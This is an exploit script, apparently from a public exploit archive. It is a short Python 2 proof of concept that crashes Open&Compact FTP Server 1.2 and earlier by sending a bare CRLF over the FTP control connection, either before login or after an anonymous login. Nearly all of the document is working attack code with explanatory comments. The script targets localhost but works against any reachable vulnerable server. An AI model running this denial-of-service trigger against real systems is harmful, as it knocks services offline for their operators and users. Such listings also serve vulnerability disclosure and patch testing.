Open and Compact FTP Server version 1.2 suffers from a denial of service vulnerability.
8ea9f2c7bebd4ac4e981c04038d3152c116e290318ce180415ce2099a0b9808f
# Exploit Title: Open&Compact Ftp Server <= 1.2 Denial Of Service
# Date: June 12, 2010
# Author: Serge Gorbunov
# Software Link: https://sourceforge.net/projects/open-ftpd/
# Version: <= 1.2
# Tested on: Windows 7, Windows XP SP3
#!/usr/bin/python
# This exploit crashes the Open&Compact FTP server at any time simply
# by sending '\r\n' into the socket.
# The '\r\n' can be sent before authentication or after authentication;
# the server crashes in both cases.
# Below are two examples of crashing the server:
# Call either crashServerBeforeAuth or crashServerAfterAuth from
# the main function.
import socket
def main():
    """Connect the module-level socket ``s`` to the test server and run one trigger.

    The target is the loopback address on the standard FTP control port.
    Only the pre-authentication variant is enabled; the post-authentication
    variant is left commented out, as in the original listing.
    """
    target = ("127.0.0.1", 21)  # local test instance, FTP control port
    s.connect(target)
    crashServerBeforeAuth()
    # crashServerAfterAuth()
    s.close()
def crashServerBeforeAuth():
    """Print the server greeting, then send a bare CRLF without logging in.

    Per the header notes, this empty command line is enough to crash
    Open&Compact FTP Server <= 1.2. No credentials are involved on this path,
    so any client that can reach the control port can trigger the fault.

    NOTE(review): the root cause is not shown on this page -- presumably the
    command parser mishandles an empty line; confirm against the server source.
    """
    # Python 2 script: recv() returns a str and send() is given a str.
    greeting = s.recv(512)
    print(greeting)
    s.send('\r\n')
def crashServerAfterAuth():
    """Log in as the anonymous user, then send a bare CRLF.

    Prints the greeting and the reply to each login command before sending
    the empty command line. Per the header notes, the server crashes in the
    authenticated state too, so requiring a login does not prevent the fault.
    """
    # Python 2 script: recv() returns a str and send() is given a str.
    print(s.recv(512))  # server greeting
    for login_line in ('USER anonymous\r\n', 'PASS anonymous\r\n'):
        s.send(login_line)
        print(s.recv(512))  # reply to the login command just sent
    s.send('\r\n')
if __name__ == "__main__":
    # The helper functions use this module-level TCP/IPv4 socket by the name ``s``,
    # so it must exist before main() is called.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    main()